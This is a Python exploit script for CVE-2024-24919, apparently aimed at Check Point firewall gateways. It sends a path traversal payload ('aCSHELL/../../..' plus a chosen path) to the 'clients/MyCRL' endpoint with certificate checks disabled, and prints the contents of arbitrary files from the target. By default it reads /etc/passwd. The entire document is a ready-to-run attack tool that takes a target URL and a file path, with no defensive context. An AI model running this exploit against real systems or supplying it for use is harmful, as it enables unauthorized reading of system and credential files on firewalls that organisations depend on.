CVE-2024-24919.py

import requests
import argparse
from urllib.parse import urljoin

def send_post_request(base_url, file):
    full_url = urljoin(base_url, 'clients/MyCRL')
    full_payload = "aCSHELL/../../../../../../.." + file


    headers = {
        'Content-Length': str(len(full_payload))
    }

    response = requests.post(full_url, data=full_payload, headers=headers, verify=False)

    print('Status Code:', response.status_code)
    print('Response:', response.content.decode())

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit the CVE-2024-24919 on the remote checkpoint firewall.')

    parser.add_argument('-u', '--url', required=True, help='The base URL to send the POST request to.')

    parser.add_argument('-f', '--file', default='/etc/passwd', help='The file to be dumped from the remote checkpoint server.')
  
    args = parser.parse_args()

    send_post_request(args.url, args.file)